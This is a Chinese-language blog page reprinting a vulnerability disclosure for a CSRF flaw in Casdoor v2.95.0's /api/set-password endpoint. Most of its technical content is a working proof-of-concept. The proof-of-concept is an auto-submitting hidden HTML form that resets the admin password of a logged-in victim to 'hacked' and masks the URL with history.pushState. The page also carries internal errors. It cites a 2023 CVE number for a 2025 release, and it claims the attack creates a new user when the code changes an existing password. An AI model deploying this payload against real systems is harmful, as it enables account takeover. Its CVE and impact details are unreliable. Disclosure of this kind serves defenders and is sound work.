Casdoor 2.95.0 CSRF漏洞利用详情与PoC分析

本文详细分析了Casdoor身份管理平台v2.95.0版本中存在的一个跨站请求伪造漏洞。该漏洞存在于/api/set-password端点,允许攻击者通过构造恶意请求来任意修改已登录用户的密码。

漏洞标题: Casdoor 2.95.0 - 跨站请求伪造 (CSRF)

应用: Casdoor

版本: v2.95.0 (2025-10-22)

日期: 2025-10-23

漏洞作者: Van Lam Nguyen

厂商主页: https://casdoor.org/

软件链接: https://github.com/casdoor/casdoor/archive/refs/tags/v2.95.0.zip

测试平台: Windows

CVE : CVE-2023-34927 (最新编号待分配)

概述

================================================== 发现 Casdoor v2.95.0 及更早版本在 /api/set-password 端点存在跨站请求伪造 (CSRF) 漏洞。此漏洞允许攻击者通过提供特制的 URL 任意更改受害用户的密码。

概念验证

==================================================

/api/set-password 发送一个绕过旧密码输入认证步骤的未授权请求。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
    <input name='userOwner' value='built&#45;in' type='hidden'>
    <input name='userName' value='admin' type='hidden'>
    <input name='newPassword' value='hacked' type='hidden'>
    <input type=submit>
</form>
<script>
    history.pushState('', '', '/');
    document.forms[0].submit();
</script>

</html>

如果用户在漏洞利用时已登录到 Casdoor 网络应用程序,将在应用程序中创建一个具有以下凭据的新用户:

  • userOwner: built-in
  • userName: admin
  • newPassword: hacked
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计